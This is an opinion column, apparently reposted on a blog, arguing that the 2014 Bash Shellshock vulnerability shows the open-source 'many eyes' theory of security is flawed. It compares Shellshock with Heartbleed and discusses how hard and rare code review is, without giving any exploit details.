Breaking

Wednesday, October 1, 2014

Shellshock proves open source's 'many eyes' can't see straight

With so many people looking at open source code, its security flaws should be stopped dead -- but it doesn't work that way.

Eye looking at data and analytics 

Can we do it? Can we once and for all declare the "many eyes" theory dead?
I'm a huge fan of open source. I have been since the days we called it freeware. I run OpenBSD and many other specialized open source distros, and I couldn't do my job as a computer security consultant without a small arsenal of open source tools.

That said, I've always called BS on the idea that the ability for anyone to review open source code means it will always be more secure than closed source software. Even before the latest contrarian example of the Bash Shellshock vulnerability, the idea of "many eyes" was fatally flawed.
In a nutshell: Just because something can be done doesn't mean it will be done.

Hiding in plain sight

Let's start with the security hole du jour. Bash was released in 1989, and the recently discovered vulnerability has been around since the beginning. We're talking an easy-to-see, easy-to-exploit bug in software that has been used by millions of people -- one that's kicked around for two-plus decades without detection.
The Bash shell is present on nearly every Linux, Unix, and BSD distribution. Even if you've applied the most recent Bash patches (released on Sept. 25) meant to close the Shellshock vulnerability, you're still vulnerable.
Some people, including InfoWorld's Paul Venezia, are declaring Shellshock to be far worse than the last "big one," the April 2014 OpenSSL Heartbleed vulnerability. Heartbleed was around for about 2.5 years before anyone noticed.
Heartbleed was bad, but Shellshock is vastly worse. Bash is installed and active on more systems than Heartbleed's OpenSSL, and Shellshock can do far more to vulnerable systems (remote execution versus information disclosure).
The real risk is in the number of systems that are remotely exploitable by unauthenticated users. Already tens of millions of Internet-facing servers have been probed for the vulnerability, and by many estimates, Shellshock is on 30 to 50 percent of all Web servers worldwide. A Web developer at one large company told me that Shellshock was easily remotely exploitable on nearly 100 percent of his servers. Ouch!

Who has time to review code?

The "many eyes" theory should have died a long time ago. Literally hundreds of open source bugs have been found years to decades after they were coded into popular open source software. The theory doesn't work because security code review is hard, mostly boring work. Those who do it well are probably being paid to do it for a living, and they don't have time to peruse every bit of open source code on the Internet.

Even if a trained computer security code reviewer wanted to review the most popular open source code -- could they? Linux itself, even before you add a single daemon or app, has more than 15 million lines of code. In fact, I bet most people wouldn't have time to properly review Linus Torvalds' 10,239 lines of code in his original October 1991 version. Today, some popular Linux distros have all together hundreds of millions of lines of code. Good luck reviewing that in your spare time.

Crowdsourcing doesn't work

Some open source authorities have tried to crowdsource the problem, only to see a lack of interest. The Sardonix code review, one of the most valiant attempts, tried a decade ago and failed. A few people, along with a college classroom or two, participated before the effort died due to low participation.
Sometimes a commercial group or the military will get involved, but their examinations are fairly limited in scope. Even if they find bugs, their suggestions and recommendations often come under suspicion. You might wonder why anyone would object to the military fixing open source software -- until you recall stories where NIST and the NSA offer ideas that place vulnerabilities into code they've reviewed or created.

Fixing the bugs creates its own problems

Even if a serious, independent, trusted security team starts reviewing smaller pieces of code -- say, a particular service or application, such as OpenSSL -- it usually results in fragmentation or forking of the code base. (Heartbleed provides a salient example.)
In other words, the fix results in different versions of code that don't always support each other. It also means two or more versions have to be reviewed every time a change is made. This is no way to mitigate the overall risk.

Where's the proof?

Last but not least, there's neither proof that open source software has fewer bugs, nor that the finding of more bugs by more people results in less security risk (compared to closed source). The total number of individual publicly known exploits in all software continues to rise. The number of people exploited worldwide continues to increase.
If "many eyes" worked, you'd expect to see a decrease in the number of bugs found over time, especially in software that has been out a while. You would expect open source software to be less exploitable than closed source software. But more to the point, from a scientific viewpoint, no independent study has proven that open source software has led to fewer exploits or fewer exploited customers.
The Shellshock vulnerability in Bash is the latest counterexample. Let it serve as a reminder that, logically, the "many eyes" theory was never on firm ground, and recent events have made its flaws more glaring than ever.

 

No comments:

Post a Comment